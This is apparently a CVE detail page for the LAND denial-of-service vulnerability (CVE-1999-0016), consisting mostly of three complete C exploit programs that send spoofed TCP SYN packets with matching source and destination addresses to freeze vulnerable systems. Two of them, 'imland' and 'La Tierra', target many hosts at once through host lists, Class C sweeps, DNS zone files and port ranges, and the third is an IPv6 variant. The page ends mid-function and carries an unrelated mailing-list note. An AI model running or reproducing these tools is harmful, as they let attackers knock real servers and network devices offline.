CVE-1999-0016 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

/* source: https://www.securityfocus.com/bid/2666/info A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00. It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue. **Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible. */ /* * imland - improved multiple land * * A good spanking session requires several good, hard slaps. * * This program lands multiple land attacks on multiple hosts as a * proof of concept of the oldly discovered but newly resurfaced * M$ `land' attack vulnerability. It was written without ill intent to * test a large range of servers for vulnerabilities in one go. * * If the targeted machines freeze up for 5-30 seconds for each packet, * that means they are vulnerable. * * Disclaimer: * This program was written without ill intent. It was designed to test * and prove the effects of the LAND attack on multiple hosts at once. * I am in no way responsible for what you do with this piece of code. * * Please use it responsibly to test your own servers only. * */ #define _BSD_SOURCE #define __FAVOR_BSD #include <stdio.h> #include <ctype.h> #include <sys/socket.h> #include <netinet/in.h> #include <stdarg.h> #include <errno.h> #include <netdb.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> /* the attack packet */ struct raw_tcp_packet { struct ip ip; struct tcphdr tcp; }; /* required to make the TCP checksum correct */ struct tcp_chksum_hdr { struct in_addr src; struct in_addr dest; u_char zero; u_char proto; u_short len; struct tcphdr tcp; }; /* linked list with all we need, really */ typedef struct target { struct sockaddr_in sa; struct { struct iphdr ip; /* included here so we can build them once */ struct tcphdr tcp; /* and thus transmit a tiny bit faster */ } pkt; struct target *next; } target; /** prototypes **/ int send_land(int, struct target *); void u_sleep(u_int); int add_target_ip(char *, struct in_addr *, u_short); u_int get_timevar(const char *); int add_target(char *); unsigned short chksum(unsigned short *, int); void finish(int); void crash(const char *, ...); void usage(void); /** external **/ extern int optind, opterr, optopt; extern int h_errno; extern char *optarg; extern char *__progname; /** global variables **/ target *list = NULL, *cursor = NULL; int targets = 0; int pkt_interval = 0; /* no delay by default */ int pkts = 1, pkts_sent = 0; /* send one per host by default */ int debug = 0; u_short defport = 139; /* default port */ /** code start **/ void crash(const char *fmt, ...) { va_list ap; printf("%s: ", __progname); va_start(ap, fmt); vprintf(fmt, ap); va_end(ap); if(errno) printf(": %s", strerror(errno)); puts(""); exit(3); } int main(int argc, char **argv) { target *host; int sock, foo; if((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) crash("socket()"); while((foo = getopt(argc, argv, "v:i:p:n:")) != EOF) { switch(foo) { case 'v': debug++; break; case 'i': pkt_interval = get_timevar(optarg); break; case 'p': defport = (u_short)strtoul(optarg, NULL, 0); break; case 'n': pkts = strtoul(optarg, NULL, 0); if(debug) printf("Sending %d packets\n", pkts); break; default: add_target(optarg); break; } } argv = &argv[optind]; while(*argv) { add_target(*argv); argv++; } if(!targets) usage(); while(!pkts || pkts > pkts_sent) { host = list; while(host) { printf("Sending to %s:%u ... ", inet_ntoa(host->sa.sin_addr), host->sa.sin_port); foo = send_land(sock, host); if(foo == - 1) printf("failed - %s\n", strerror(errno)); else printf("ok, landed %d bytes\n", foo); if(pkt_interval) u_sleep(pkt_interval); host = host->next; } pkts_sent++; } return 0; } /* build and send the land attack packet */ int send_land(int sock, struct target *host) { struct raw_tcp_packet pkt; struct tcp_chksum_hdr tcc; memset(&pkt, 0, sizeof(pkt)); memset(&tcc, 0, sizeof(tcc)); /* ip options */ pkt.ip.ip_v = IPVERSION; pkt.ip.ip_hl = sizeof(struct iphdr) / 4; pkt.ip.ip_tos = 0; pkt.ip.ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr)); pkt.ip.ip_off = htons(IP_DF); pkt.ip.ip_ttl = 0xff; pkt.ip.ip_p = IPPROTO_TCP; pkt.ip.ip_src = pkt.ip.ip_dst = host->sa.sin_addr; pkt.ip.ip_sum = chksum((u_short *)&pkt.ip, sizeof(struct iphdr)); tcc.src = tcc.dest = host->sa.sin_addr; tcc.zero = 0; tcc.proto = IPPROTO_TCP; tcc.len = htons(sizeof(struct tcphdr)); tcc.tcp.th_sport = tcc.tcp.th_dport = htons(host->sa.sin_port); tcc.tcp.th_seq = htons(0x1d1); tcc.tcp.th_off = sizeof(struct ip) / 4; tcc.tcp.th_flags = TH_SYN; tcc.tcp.th_win = htons(512); memcpy(&pkt.tcp, &tcc.tcp, sizeof(struct tcphdr)); pkt.tcp.th_sum = chksum((u_short *)&tcc, sizeof(tcc)); return sendto(sock, &pkt, sizeof(pkt), 0, (struct sockaddr *)&host->sa, sizeof(struct sockaddr_in)); } /* calculate checksum */ u_short chksum(u_short *p, int n) { register long sum = 0; while(n > 1) { sum += *p++; n -= 2; } /* mop up the occasional odd byte */ if(n == 1) sum += *(u_char *)p; sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum = sum + (sum >> 16); /* add carry */ return ~sum; /* ones-complement, truncate */ } /* usleep() the portable way. No error checking is done, * so this might theoretically fail. */ void u_sleep(u_int u_sec) { struct timeval to; fd_set readset, writeset; if(debug > 3) printf("sleeping for %u microseconds\n", u_sec); if(!u_sec) return; to.tv_sec = u_sec / 1000000; to.tv_usec = u_sec % 1000000; FD_ZERO(&writeset); FD_ZERO(&readset); select(0, &readset, &writeset, NULL, &to); return; } int add_target_ip(char *arg, struct in_addr *in, u_short port) { struct target *host; /* disregard obviously stupid addresses */ if(in->s_addr == INADDR_NONE || in->s_addr == INADDR_ANY) return -1; if(debug) printf("Adding %s:%u to target list\n", inet_ntoa(*in), port); /* add the fresh ip */ host = malloc(sizeof(struct target)); if(!host) { crash("add_target_ip(%s, %s): malloc(%d) failed", arg, inet_ntoa(*in), sizeof(struct target)); } memset(host, 0, sizeof(struct target)); /* fill out the sockaddr_in struct */ host->sa.sin_family = AF_INET; host->sa.sin_addr.s_addr = in->s_addr; host->sa.sin_port = port ? port : defport; if(!list) list = host; else cursor->next = host; cursor = host; targets++; return 0; } /* wrapper for add_target_ip to resolve stuff as well */ int add_target(char *arg) { int i; struct hostent *he; struct in_addr *in, ip; char *port_str; u_short port = 0; if(!arg) return -1; if((port_str = strchr(arg, ':'))) { *port_str = '\0'; port_str++; if(*port_str) port = (u_short)strtoul(port_str, NULL, 0); } /* don't resolve if we don't have to */ if(inet_aton(arg, &ip)) return add_target_ip(arg, &ip, port); /* not an IP, so resolve */ errno = 0; he = gethostbyname(arg); if(!he && h_errno == TRY_AGAIN) { u_sleep(500000); he = gethostbyname(arg); } if(!he) crash("Failed to resolve %s: %s", arg, hstrerror(h_errno)); /* add all the IP's as targets */ for(i = 0; he->h_addr_list[i]; i++) { in = (struct in_addr *)he->h_addr_list[i]; add_target_ip(arg, in, port); } return 0; } /* * u = micro * m = milli * s = seconds * return value is in microseconds */ u_int get_timevar(const char *str) { char p, u, *ptr; unsigned int len; u_int i, d; /* integer and decimal, respectively */ u_int factor = 1000; /* default to milliseconds */ if(!str) return 0; len = strlen(str); if(!len) return 0; /* unit might be given as ms|m (millisec), * us|u (microsec) or just plain s, for seconds */ u = p = '\0'; u = str[len - 1]; if(len >= 2 && !isdigit((int)str[len - 2])) p = str[len - 2]; if(p && u == 's') u = p; else if(!p) p = u; if(debug > 3) printf("evaluating %s, u: %c, p: %c\n", str, u, p); if(u == 'u') factor = 1; /* microseconds */ else if(u == 'm') factor = 1000; /* milliseconds */ else if(u == 's') factor = 1000000; /* seconds */ if(debug > 3) printf("factor is %u\n", factor); i = strtoul(str, &ptr, 0); if(!ptr || *ptr != '.' || strlen(ptr) < 2 || factor == 1) return i * factor; /* time specified in usecs can't have decimal points, so ignore them */ if(factor == 1) return i; d = strtoul(ptr + 1, NULL, 0); /* d is decimal, so get rid of excess baggage */ while(d >= factor) d /= 10; /* the last parenthesis avoids floating point exceptions. */ return ((i * factor) + (d * (factor / 10))); } void usage(void) { printf("Usage: %s -i <interval> -p <port> -n <pkts> host1:port1 hostn:portn\n\n", __progname); printf("-i sets packet interval in milliseconds.\n"); printf(" You can specify Nus for N microseconds, or Ns for N seconds.\n"); printf(" Default is 0, which is good for multiple hosts and one packet.\n"); printf(" If you want to send continuously, specify 1s or more, so as to not\n"); printf(" cause DoS due to sheer traffic volume.\n\n"); printf("-p sets the DEFAULT port (139 if not specified)\n\n"); printf("-n determines how many packets to send to each target. Default is 1\n\n"); printf("host:port combinations can be given as such; 207.46.130.108:80\n"); printf("The port part of a target definition ovverrides the defaults.\n\n"); printf("Hostnames will be resolved, if possible.\n"); exit(1); }

source: https://www.securityfocus.com/bid/2666/info A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00. It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue. **Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible. // // Example usage: LandIpV6 \Device\NPF_{B1751317-BAA0-43BB-A69B-A0351960B28D} fe80::2a1:b0ff:fe08:8bcc 135 // // Written by: Konrad Malewski. // #include <stdlib.h> #include <stdio.h> #include <Winsock2.h> #include <ws2tcpip.h> #include <pcap.h> #include <remote-ext.h> /////////////////////////////////////////////////////////////////////////////// ///////////// from libnet ///////////// /* ethernet addresses are 6 octets long */ #define ETHER_ADDR_LEN 0x6 typedef unsigned char u_int8_t; typedef unsigned short u_int16_t; typedef unsigned int u_int32_t; typedef unsigned __int64 u_int64_t; /* * Ethernet II header * Static header size: 14 bytes */ struct libnet_ethernet_hdr { u_int8_t ether_dhost[ETHER_ADDR_LEN];/* destination ethernet address */ u_int8_t ether_shost[ETHER_ADDR_LEN];/* source ethernet address */ u_int16_t ether_type; /* protocol */ }; struct libnet_in6_addr { union { u_int8_t __u6_addr8[16]; u_int16_t __u6_addr16[8]; u_int32_t __u6_addr32[4]; } __u6_addr; /* 128-bit IP6 address */ }; /* * IPv6 header * Internet Protocol, version 6 * Static header size: 40 bytes */ struct libnet_ipv6_hdr { u_int8_t ip_flags[4]; /* version, traffic class, flow label */ u_int16_t ip_len; /* total length */ u_int8_t ip_nh; /* next header */ u_int8_t ip_hl; /* hop limit */ struct libnet_in6_addr ip_src, ip_dst; /* source and dest address */ }; /* * TCP header * Transmission Control Protocol * Static header size: 20 bytes */ struct libnet_tcp_hdr { u_int16_t th_sport; /* source port */ u_int16_t th_dport; /* destination port */ u_int32_t th_seq; /* sequence number */ u_int32_t th_ack; /* acknowledgement number */ u_int8_t th_x2:4, /* (unused) */ th_off:4; /* data offset */ u_int8_t th_flags; /* control flags */ u_int16_t th_win; /* window */ u_int16_t th_sum; /* checksum */ u_int16_t th_urp; /* urgent pointer */ }; int libnet_in_cksum(u_int16_t *addr, int len) { int sum; union { u_int16_t s; u_int8_t b[2]; }pad; sum = 0; while (len > 1) { sum += *addr++; len -= 2; } if (len == 1) { pad.b[0] = *(u_int8_t *)addr; pad.b[1] = 0; sum += pad.s; } return (sum); } #define LIBNET_CKSUM_CARRY(x) (x = (x >> 16) + (x & 0xffff), (~(x + (x >> 16)) & 0xffff)) /////////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////// u_char packet[74]; struct libnet_ipv6_hdr *ip6_hdr = (libnet_ipv6_hdr *) (packet + 14); struct libnet_tcp_hdr *tcp_hdr = (libnet_tcp_hdr *) (packet + 54); struct libnet_ethernet_hdr *eth_hdr = (libnet_ethernet_hdr *) packet; u_char errbuf[1024]; pcap_t *pcap_handle; void usage(char* n) { pcap_if_t * alldevs,*d; int i=1; fprintf(stdout,"Usage:\n" "\t %s <device> <victim> <port>\n",n); if (pcap_findalldevs (&alldevs, (char*)errbuf) == -1) { fprintf( stderr, "Error in pcap_findalldevs ():%s\n" ,errbuf); exit(EXIT_FAILURE); } printf("Avaliable adapters: \n"); d = alldevs; while (d!=NULL) { printf("\t%d) %s\n\t\t%s\n",i++,d->name,d->description); d = d->next; } pcap_freealldevs (alldevs); } /////////////////////////////////////////////////////////////////////////////// int main(int argc, char* argv[]) { if ( argc<4 ) { usage(argv[0]); return EXIT_FAILURE; } int retVal; struct addrinfo hints,*addrinfo; ZeroMemory(&hints,sizeof(hints)); WSADATA wsaData; if ( WSAStartup( MAKEWORD(2,2), &wsaData ) != NO_ERROR ) { fprintf( stderr, "Error in WSAStartup():%d\n",WSAGetLastError()); return EXIT_FAILURE; } // // Get MAC address of remote host (assume link local IpV6 address) // hints.ai_family = PF_INET6; hints.ai_socktype = SOCK_STREAM; hints.ai_protocol = IPPROTO_TCP; hints.ai_flags = AI_PASSIVE; retVal = getaddrinfo(argv[2],0, &hints, &addrinfo); if ( retVal!=0 ) { WSACleanup(); fprintf( stderr, "Error in getaddrinfo():%d\n",WSAGetLastError()); exit(EXIT_FAILURE); } // // Open WinPCap adapter // if ( (pcap_handle = pcap_open_live (argv[1], 1514, PCAP_OPENFLAG_PROMISCUOUS, 100, (char*)errbuf)) == NULL ) { freeaddrinfo(addrinfo); WSACleanup(); fprintf(stderr, "Error opening device: %s\n",argv[1]); return EXIT_FAILURE; } ZeroMemory(packet,sizeof(packet)); struct sockaddr_in6 *sa = (struct sockaddr_in6 *) addrinfo->ai_addr; // fill ethernet header eth_hdr->ether_dhost[0] = eth_hdr->ether_shost[0] = 0;// assume address like 00:something; eth_hdr->ether_dhost[1] = eth_hdr->ether_shost[1] = sa->sin6_addr.u.Byte[9]; eth_hdr->ether_dhost[2] = eth_hdr->ether_shost[2] = sa->sin6_addr.u.Byte[10]; eth_hdr->ether_dhost[3] = eth_hdr->ether_shost[3] = sa->sin6_addr.u.Byte[13]; eth_hdr->ether_dhost[4] = eth_hdr->ether_shost[4] = sa->sin6_addr.u.Byte[14]; eth_hdr->ether_dhost[5] = eth_hdr->ether_shost[5] = sa->sin6_addr.u.Byte[15]; eth_hdr->ether_type = 0xdd86; // fill IP header // source ip == destination ip memcpy(ip6_hdr->ip_src.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte)); memcpy(ip6_hdr->ip_dst.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte)); ip6_hdr->ip_hl = 255; ip6_hdr->ip_nh = IPPROTO_TCP; ip6_hdr->ip_len = htons (20); ip6_hdr->ip_flags[0] = 0x06 << 4; srand((unsigned int) time(0)); // fill tcp header tcp_hdr->th_sport = tcp_hdr->th_dport = htons (atoi(argv[3])); // source port equal to destination tcp_hdr->th_seq = rand(); tcp_hdr->th_ack = rand(); tcp_hdr->th_off = htons(5); tcp_hdr->th_win = rand(); tcp_hdr->th_sum = 0; tcp_hdr->th_urp = htons(10); tcp_hdr->th_off = 5; tcp_hdr->th_flags = 2; // calculate tcp checksum int chsum = libnet_in_cksum ((u_int16_t *) & ip6_hdr->ip_src, 32); chsum += ntohs (IPPROTO_TCP + sizeof (struct libnet_tcp_hdr)); chsum += libnet_in_cksum ((u_int16_t *) tcp_hdr, sizeof (struct libnet_tcp_hdr)); tcp_hdr->th_sum = LIBNET_CKSUM_CARRY (chsum); // send data to wire retVal = pcap_sendpacket (pcap_handle, (u_char *) packet, sizeof(packet)); if ( retVal == -1 ) { fprintf(stderr,"Error writing packet to wire!!\n"); } // // close adapter, free mem.. etc.. // pcap_close(pcap_handle); freeaddrinfo(addrinfo); WSACleanup(); return EXIT_SUCCESS; } -- NTBugtraq Editor's Note: Most viruses these days use spoofed email addresses. As such, using an Anti-Virus product which automatically notifies the perceived sender of a message it believes is infected may well cause more harm than good. Someone who did not actually send you a virus may receive the notification and scramble their support staff to find an infection which never existed in the first place. Suggest such notifications be disabled by whomever is responsible for your AV, or at least that the idea is considered. --

/* source: https://www.securityfocus.com/bid/2666/info A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00. It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue. **Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible. */ /**************************************************************/ /* */ /* La Tierra v1.0b - by MondoMan (KeG), [email protected] */ /* */ /* Modified version of land.c by m3lt, FLC */ /* */ /* Compiled on RedHat Linux 2.0.27, Intel Pentium 200Mhz */ /* gcc version 2.7.2.1 tabs set to 3 */ /* */ /* gcc latierra.c -o latierra */ /* */ /* Refer to readme.txt for more details and history */ /* */ /**************************************************************/ #include <stdio.h> #include <getopt.h> #include <string.h> #include <netdb.h> #include <arpa/inet.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/ip.h> #include <netinet/ip_tcp.h> #include <netinet/protocols.h> #define DEFAULT_FREQUENCY 1 #define TRUE 1 #define FALSE 0 #define FOR_EVER -5 #define LIST_FILE 1 #define ZONE_FILE 2 #define MAXLINELENGTH 512 #define DEFAULT_SEQ 0xF1C #define DEFAULT_TTL 0xFF #define DEFAULT_TCPFLAGS (TH_SYN | TH_PUSH) #define DEFAULT_WINSIZE 0xFDE8 struct pseudohdr { struct in_addr saddr; struct in_addr daddr; u_char zero; u_char protocol; u_short length; struct tcphdr tcpheader; }; typedef struct latierra_data { char dest_ip[256]; int tcp_flags; int window_size; int ip_protocol; int sequence_number; int ttl; int supress_output; int message_type; } LATIERRA_DATA; void alternatives(void); int get_ip(int use_file, FILE *fp, char *buff); int land(LATIERRA_DATA *ld, int port_number); void nslookup_help(void); void print_arguments(void); void protocol_list(void); /********/ /* main */ /********/ int main(int argc, char **argv) { FILE *fp; LATIERRA_DATA ld; int frequency = DEFAULT_FREQUENCY, x; int beginning_port=1, octet=1, scan_loop=0, loop_val=0, use_file=FALSE; int ending_port = 0, loop = TRUE, i = 0, increment_addr = FALSE; char got_ip = FALSE, got_beg_port = FALSE; char class_c_addr[21], filename[256], buff[512], valid_tcp_flags[16]; printf("\nlatierra v1.0b by MondoMan ([email protected]), KeG\n"); printf("Enhanced version of land.c originally developed by m3lt, FLC\n"); strcpy(valid_tcp_flags, "fsrpau"); ld.tcp_flags = 0; ld.window_size = DEFAULT_WINSIZE; ld.ip_protocol = IP_TCP; ld.sequence_number = DEFAULT_SEQ; ld.ttl = DEFAULT_TTL; ld.message_type = 0; if(argc > 1 && (!strcmp(argv[1], "-a"))) alternatives(); if(argc > 1 && (!strcmp(argv[1], "-n"))) nslookup_help(); if(argc > 1 && (!strcmp(argv[1], "-p"))) protocol_list(); if(argc == 1 || ( (argc >= 2) && (!strcmp(argv[1], "-h")))) print_arguments(); while((i = getopt(argc, argv, "i:b:e:s:l:o:t:w:p:q:v:m:")) != EOF) { switch(i) { case 't': for(x=0;x<strlen(optarg);x++) switch(optarg[x]) { case 'f': /* fin */ ld.tcp_flags |= TH_FIN; break; case 's': /* syn */ ld.tcp_flags |= TH_SYN; break; case 'r': /* reset */ ld.tcp_flags |= TH_RST; break; case 'p': /* push */ ld.tcp_flags |= TH_PUSH; break; case 'a': /* ack */ ld.tcp_flags |= TH_ACK; break; case 'u': /* urgent */ ld.tcp_flags |= TH_URG; break; default: printf("\nERROR: Invalid option specified [ %c ] for tcp_flags.\n\n", optarg[x]); return(-12); break; } break; case 'q': ld.sequence_number = atoi(optarg); break; case 'w': ld.window_size = atoi(optarg); break; case 'm': ld.message_type = atoi(optarg); break; case 'v': ld.ttl = atoi(optarg); break; case 'p': ld.ip_protocol = atoi(optarg); break; case 'o': ld.supress_output = TRUE; break; case 'i': if(strlen(optarg) > 1) strcpy(ld.dest_ip, optarg); else { printf("ERROR: Must specify valid IP or hostname.\n"); return(-6); } got_ip = TRUE; break; case 's': frequency = atoi(optarg); break; case 'l': loop = atoi(optarg); break; case 'b': beginning_port = atoi(optarg); got_beg_port = TRUE; break; case 'e': ending_port = atoi(optarg); break; } } if(!ld.tcp_flags) ld.tcp_flags = DEFAULT_TCPFLAGS; if(!got_beg_port) { fprintf(stderr, "\nMust specify beginning port number. Use -h for help with arguments.\n\n"); return(-7); } if(ending_port == 0) ending_port = beginning_port; printf("\nSettings:\n\n"); printf(" (-i) Dest. IP Addr : "); if(ld.dest_ip[strlen(ld.dest_ip) -1] == '-') { ld.dest_ip[strlen(ld.dest_ip)-1] = 0x0; strcpy(class_c_addr, ld.dest_ip); strcat(ld.dest_ip, "1"); printf(" %s (Class C range specified).\n", ld.dest_ip); increment_addr = TRUE; octet = 1; } else if(strlen(ld.dest_ip) > 5) { if(strncmp(ld.dest_ip, "zone=", 5)==0) { strcpy(filename, &ld.dest_ip[5]); printf("%s (using DNS zone file)\n", filename); use_file = ZONE_FILE; } else if(strncmp(ld.dest_ip, "list=", 5) == 0) { strcpy(filename, &ld.dest_ip[5]); printf("%s (using ASCII list)\n", filename); use_file = LIST_FILE; } else printf("%s\n", ld.dest_ip); } else { printf("Destination specifier (%s) length must be > 7.\n", ld.dest_ip); return(-9); } printf(" (-b) Beginning Port #: %d\n", beginning_port ); printf(" (-e) Ending Port # : %d\n", ending_port ); printf(" (-s) Seconds to Pause: %d\n", frequency ); printf(" (-l) Loop : %d %s\n", loop, (loop == FOR_EVER) ? "(forever)" : " " ); printf(" (-w) Window size : %d\n", ld.window_size ); printf(" (-q) Sequence Number : %X (%d)\n",ld.sequence_number, ld.sequence_number ); printf(" (-v) Time-to-Live : %d\n", ld.ttl); printf(" (-p) IP Protocol # : %d\n", ld.ip_protocol ); printf(" (-t) TCP flags : "); strcpy(buff, ""); if( ld.tcp_flags & TH_FIN) strcat(buff, "fin "); if( ld.tcp_flags & TH_SYN) strcat(buff, "syn "); if(ld.tcp_flags & TH_RST) strcat(buff, "rst "); if(ld.tcp_flags & TH_PUSH) strcat(buff, "push "); if(ld.tcp_flags & TH_ACK) strcat(buff, "ack "); if(ld.tcp_flags & TH_URG) strcat(buff, "urg "); printf("%s\n\n", buff); if(ending_port < beginning_port) { printf("\nERROR: Ending port # must be greater than beginning port #\n\n"); return(-8); } scan_loop = loop_val = loop; if(use_file) { if(access(filename, 0)) { printf("\nERROR: The file you specified (%s) cannot be found.\n\n", filename); return(-9); } if( (fp = fopen(filename, "rt")) == NULL) { printf("ERROR: Unable to open %s.\n", filename); return(-10); } if(!get_ip(use_file, fp, buff)) { printf("Unable to get any IP address from file %s.\n"); return(-11); } strcpy(ld.dest_ip, buff); } while( (loop == FOR_EVER) ? 1 : loop-- > 0) { for(i=beginning_port; i <= ending_port; i++) { if(land(&ld, i)) /* go for it BaBy! */ break; if(frequency) /* make sure freq > 0 */ { if(!ld.supress_output) printf("-> paused %d seconds.\n", frequency); sleep(frequency); } } if( (!use_file) && (loop && increment_addr) ) { char temp_addr[21]; if(++octet > 254) /* check for reset */ { if(loop_val != FOR_EVER) /* make sure not to distrute forever! */ { if(++scan_loop > loop_val) /* check if scanned x times */ break; else loop = loop_val; /* restore original value */ } octet = 1; /* reset */ } sprintf(temp_addr, "%s%d", class_c_addr, octet); strcpy(ld.dest_ip, temp_addr); if(!ld.supress_output) printf("** incrementing to next IP address: %s\n", ld.dest_ip); if(scan_loop > loop_val) break; /* break while loop */ } else if(use_file) { if(!get_ip(use_file, fp, buff)) break; loop++; strcpy(ld.dest_ip, buff); } } /* end while */ printf("\nDone.\n\n"); } /* end main */ int get_ip(int use_file, FILE *fp, char *buff) { if(use_file == LIST_FILE) return(get_ip_from_list(fp, buff)); return(get_ip_from_zone(fp, buff)); } int get_ip_from_list(FILE *fp, char *buff) { int ret_val; while(1) { ret_val = (int)fgets(buff, MAXLINELENGTH, fp); if((ret_val == EOF) || (ret_val == (int)NULL)) return 0; if( strlen(buff) >= 7) if((buff[0] != ';') && (buff[0] != '[')) { if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') ) buff[strlen(buff)-1] = 0x0; return 1; } } return 0; } int get_ip_from_zone(FILE *fp, char *buff) { int ret_val, i; char *p, delim[8]; strcpy(delim, " \t"); while(1) { ret_val = (int)fgets(buff, MAXLINELENGTH, fp); if((ret_val == EOF) || (ret_val == (int)NULL)) return 0; if( strlen(buff) >= 7) if((buff[0] != ';') && (buff[0] != '[') && (strncmp(buff, "ls -d", 5) != 0)) { if( (p = strtok( buff, delim)) == NULL) continue; if( (p = strtok(NULL, delim)) == NULL) continue; if(strcmp(p, "A")) /* be sure second column is an DNS A record */ continue; if( (p = strtok(NULL, delim)) == NULL) continue; strcpy(buff, p); /* verify that we have a valid IP address to work with */ if(inet_addr(p) == -1) continue; /* strip off training line characters */ if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') ) buff[strlen(buff)-1] = 0x0; return 1; } } return 0; } /************/ /* checksum */ /************/ u_short checksum(u_short * data,u_short length) { register long value; u_short i; for(i = 0; i< (length >> 1); i++) value += data[i]; if((length & 1)==1) value += (data[i] << 8); value = (value & 0xFFFF) + (value >> 16); return(~value); } /********/ /* land */ /********/ int land(LATIERRA_DATA *ld, int port_number) { struct sockaddr_in sin; int sock; char buffer[40]; struct iphdr * ipheader = (struct iphdr *) buffer; struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr)); struct pseudohdr pseudoheader; bzero(&sin,sizeof(struct sockaddr_in)); sin.sin_family=AF_INET; if((sin.sin_addr.s_addr=inet_addr(ld->dest_ip))==-1) { printf("ERROR: unknown host %s\n", ld->dest_ip); return(-1); } if((sin.sin_port=htons(port_number))==0) { printf("ERROR: unknown port %s\n",port_number); return(-2); } if((sock=socket(AF_INET,SOCK_RAW,255))==-1) { printf("ERROR: couldn't allocate raw socket\n"); return(-3); } bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr)); ipheader->version=4; ipheader->ihl=sizeof(struct iphdr)/4; ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr)); ipheader->id=htons(ld->sequence_number); ipheader->ttl = ld->ttl; ipheader->protocol = ld->ip_protocol; ipheader->saddr=sin.sin_addr.s_addr; ipheader->daddr=sin.sin_addr.s_addr; tcpheader->th_sport = sin.sin_port; tcpheader->th_dport = sin.sin_port; tcpheader->th_seq = htonl(ld->sequence_number); tcpheader->th_flags = ld->tcp_flags; tcpheader->th_off = sizeof(struct tcphdr)/4; tcpheader->th_win = htons(ld->window_size); bzero(&pseudoheader,12+sizeof(struct tcphdr)); pseudoheader.saddr.s_addr=sin.sin_addr.s_addr; pseudoheader.daddr.s_addr=sin.sin_addr.s_addr; pseudoheader.protocol = ld->ip_protocol; pseudoheader.length = htons(sizeof(struct tcphdr)); bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr)); tcpheader->th_sum = checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr)); if( sendto(sock, buffer, sizeof(struct iphdr)+sizeof(struct tcphdr), ld->message_type, (struct sockaddr *) &sin, sizeof(struct sockaddr_in) )==-1) { printf("ERROR: can't send packet. (sendto failed)\n"); return(-4); } if(!ld->supress_output) printf("-> packet successfully sent to: %s:%d\n", ld->dest_ip, port_number); close(sock); return(0); } /* End of land */ void alternatives() { printf("\nAlternative command line arguments for option -i\n\n"); printf(" You can create two types of files that latierra can use to get\n"); printf(" a list of IP addresses, a simple ASCII file with each IP address\n"); printf(" appearing on each line or better yet, a DNS zone file created by\n"); printf(" nslookup. If you are unfamiliar with nslookup, specify a '-n' on the\n"); printf(" command line of latierra.\n\n"); printf(" Basically, latierra will walk down the list and send the spoofed packet\n"); printf(" to each IP address. Once the list is complete, and loop > 1, the list\n"); printf(" is repeated. To specify that the '-i' option should use a zone file,\n"); printf(" specify \"zone=filename.txt\" instead of an IP address. To specify a \n"); printf(" simple ASCII list of IP addresses, use \"list=filename.txt\". Lines\n"); printf(" beginning with ';' or '[' are ignored. Lines that are not an 'A' \n"); printf(" record (second column)in a zone file will ignored.\n\n"); exit(-1); } void nslookup_help() { printf("\nNSLOOKUP help\n\n"); printf("To see who is the DNS server for a particular domain, issue the following:\n"); printf(" > set type=ns\n"); printf(" > xyz.com\n\n"); printf(" You will see a list of the name server(s) if completed successfully\n\n"); printf("To get a list of all the DNS entries for a particular domain, run nslookup\n"); printf("and issue the following commands:\n"); printf(" > server 1.1.1.1\n"); printf(" > ls -d xyz.com > filename.txt\n\n"); printf("Line 1 sets the server that nslookup will use to resolve a name.\n"); printf("Line 2 requires all the information about xyz.com be written to filename.txt\n\n"); exit(-1); } void protocol_list() { printf("\nProtocol List:\n\n"); printf("Verified:\n"); printf("1-ICMP 2-IGMP 3-GGP 5-ST 6-TCP 7-UCL 8-EGP 9-IGP 10-BBN_RCC_MON\n"); printf("11-NVP11 